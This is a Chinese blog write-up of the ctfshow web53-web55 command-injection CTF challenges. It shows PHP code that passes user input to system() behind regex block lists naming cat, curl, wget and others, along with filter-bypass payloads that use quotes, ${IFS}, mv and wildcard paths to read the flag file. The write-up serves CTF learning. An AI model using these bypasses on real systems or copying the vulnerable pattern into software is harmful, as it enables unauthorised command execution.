web入门 命令执行 web53-web55

最新推荐文章于 2024-06-10 18:21:24 发布
最新推荐文章于 2024-06-10 18:21:24 发布
阅读量3.1k 收藏
点赞数
分类专栏: ctfshow 从0开始学web 安全笔记 文章标签: web安全 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52444045/article/details/124080957
版权
本文介绍了三个PHP代码片段,展示了如何通过过滤绕过执行系统命令。在web53中,利用单引号和IFS变量绕过过滤执行`cat`命令;在web54中,通过`mv`命令重命名文件并访问新文件获取信息;在web55中,由于字母被过滤,使用base64编码执行命令。这些例子揭示了PHP安全防护的重要性及潜在漏洞利用技巧。
摘要由CSDN通过智能技术生成

文章目录

web53

<?php

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        echo($c);
        $d = system($c);
        echo "<br>".$d;
    }else{
        echo 'no';
    }
}else{
    highlight_file(__FILE__);
}

这个过滤相对之前的来说,没有多过滤什么

不同之处在于,多了一个system() 并且对结果进行了回显
在这里插入图片描述
system会回显成功的最后一行输出结果

构造?c=ca''t${IFS}fla?.php
两个单引号’'绕过cat过滤,${IFS}绕过空格过滤,fla?绕过flag过滤
在这里插入图片描述

web54

 <?php

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

这个题过滤了很多东西,但是没有过滤mv命令。

先看一下目录下的文件?c=ls
在这里插入图片描述
然后利用mv命令

?c=mv${IFS}fla?.php${IFS}a.txt

然后访问/a.txt
在这里插入图片描述

web55

可以参考这个大佬的博客:https://blog.csdn.net/xiaolong22333/article/details/109480420

<?php

// 你们在炫技吗?
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

这个题把字母都过滤了

可以用bin下的base64命令(为啥用base64?因为它含有数字64可以用???64来匹配,其他命令无法匹配到)

?c=/???/????64 ????????

得到的东西base64解码即可得到flag

sec0nd_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow web入门 命令执行后篇(web55-web188)
ccfly1012的博客
09-04 1950
web55 <?php ​ /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 20:03:51 # @email: h1xa@ctfer.com # @link: https://ctfer.com ​ */ ​ // 你们在炫技吗? if(isset($_GET['c']..
WebAPI入门指南-闲话安全
02-26
WebAPI入门指南有些朋友回复问了些安全方面的问题,安全方面可以写的东西实在太多了,这里尽量围绕着WebAPI的安全性来展开,介绍一些安全的基本概念,常见安全隐患、相关的防御技巧以及WebAPI提供的安全机制。...
无字母数字的命令执行(ctfshow web入门 55
热门推荐
Firebasky的博客
09-10 1万+
这几天都没有怎么学习,基本上都是复习学科知识,因为我们要期末考试。刚刚好今天有时间来做了一道命令执行的题,再一次拜读了 p神的文章。受益匪浅。 直接进入正题 源代码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 20:03:51 # @email: h1x.
ctfshow-web入门-命令执行web53-web55
最新发布
Welcome To Myon'Blog !
06-10 1157
这里的代码有点不一样,说一下这两种的区别:(1)直接执行 system($c);这种方式会直接执行命令 $c 并将命令的输出直接发送到标准输出(通常是浏览器);不会返回命令的输出值,因此不能对输出结果进行进一步处理。(2)使用一个参数来接受 system 的返回值后再输出它这种方式不仅会执行命令 $c,而且会将命令的最后一行输出结果赋值给变量 $d;然后通过 echo "".$d;将变量 $d 的内容输出到标准输出;
CTFshow web55
ChenD的学习笔记
11-10 1026
CTFshow web55
ctfshow web55
snowlyzz的博客
05-30 884
/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 20:03:51 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_GET['c'])){ $c=$_GET['c..
CTFshow 命令执行 web55
Kradress的博客
11-20 264
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 20:03:51 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_GET[
WebApi入门到精通-WebApi列表
03-30
WebApi入门到精通-WebApi列表】 在IT行业中,Web API是构建RESTful服务的重要工具,特别是对于那些需要提供HTTP服务的后端开发者来说。本教程“WebApi入门到精通-WebApi列表”旨在帮助初学者理解并掌握ASP.NET ...
资料-Web前端入门教程资料下载地址.txt
03-30
|- web前端培训班_web前端开发优质教程_前端工程师培训-黑马程序员.png |- HTML入门及基础02资料.zip |- HTML5入门及基础01资料.zip |- CSS3入门及提高 08资料.zip |- CSS3入门及提高 07资料.zip |- CSS3入门及提高 ...
WEB安全入门-task0
10-14
http协议、状态码、url请求协议
CTFshow web入门 web41~web55 命令执行_ctfshow web41,2024年最新简单聊聊2024年网络安全开发的现状和思考
2401_84164527的博客
04-09 868
k %60 %0b l %60 %0c m %60 %0d n %60 %0e o %60 %0f p %60 %10 q %60 %11 r %60 %12 s %60 %13 t %60 %14 u %60 %15 v %60 %16 w %60 %17 x %60 %18 y %60 %19 z %60 %1a { %60 %1b | %60 %1c } %60 %1d ~ %60 %1e ` %60 %20从所有字符(ASCII[0-255])中排除掉被过滤的,然后再判断或运算得到的字符是否为可见字
CTFshow web入门 web41~web55 命令执行_ctfshow web41,看完我工资从12K变成了20K
m0_60666452的博客
04-05 893
cat、flag、[空格]、[0-9]、*、more、wget、less、head、sort、tail、sed、cut、tac、awk、strings、od、curl、`、%、\x09、\x26、>、、
CTFshow web入门 web41~web55 命令执行
qq_56815564的博客
04-15 1472
这回是真正意义上的禁用了这些命令了,以前还能通过中间添加一些特殊符号来绕过的,现在是完全不能使用了,毕竟 . 后面跟上一个通配符后,就完全不能在中间加点什么了。简单分析一下,if中的语句第一个是输出GET传入的参数、第二个是执行c的语句后得到的东西赋值给d、第三个是换行后在输出d的内容。但是留下了一个一个或运算符( | )空格不能用可以使用tab键代替,url编码是%09,反正tab是最多是4个空格,多几个空格也不会怎样。说到底,这么多能有回显的函数,也不差cat这一个,形式有这么多,也不差分号这一个。
CTFshow 命令执行 web53
Kradress的博客
11-20 965
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 18:21:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $
ctfshow web入门命令执行web49-web53
m0_62207170的博客
03-31 261
ctfshow web入门命令执行web49-web53
ctfshow web入门55~122 命令执行
qq_53063436的博客
10-14 2376
<?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 20:03:51 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_GET['c'])){ $c=
ctfshow web入门命令执行部分(更新至56)
L1ni01
10-16 3133
ctfshow web 入门 命令执行部分 web29 源码 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } payload:c=system('cat f*'); 匹配任何字符串/文本,包括空字符串;
CTFSHOW-命令执行
Monica的博客
09-03 4105
WEB29 题目: <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 分析:题目过滤了flag且忽略大小写 知识点:linux通配符 * 匹配任何字符串/文本,包括空字符串;*代表任意字符..
CTFshow——命令执行
lee_maple的博客
04-23 5582
CTFshow——命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 可以看到,flag已经被过滤掉,先查看目录 我们可以使用通配符绕过flag的过滤 Web30 <?php
ctfshow web入门命令执行
09-05
CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值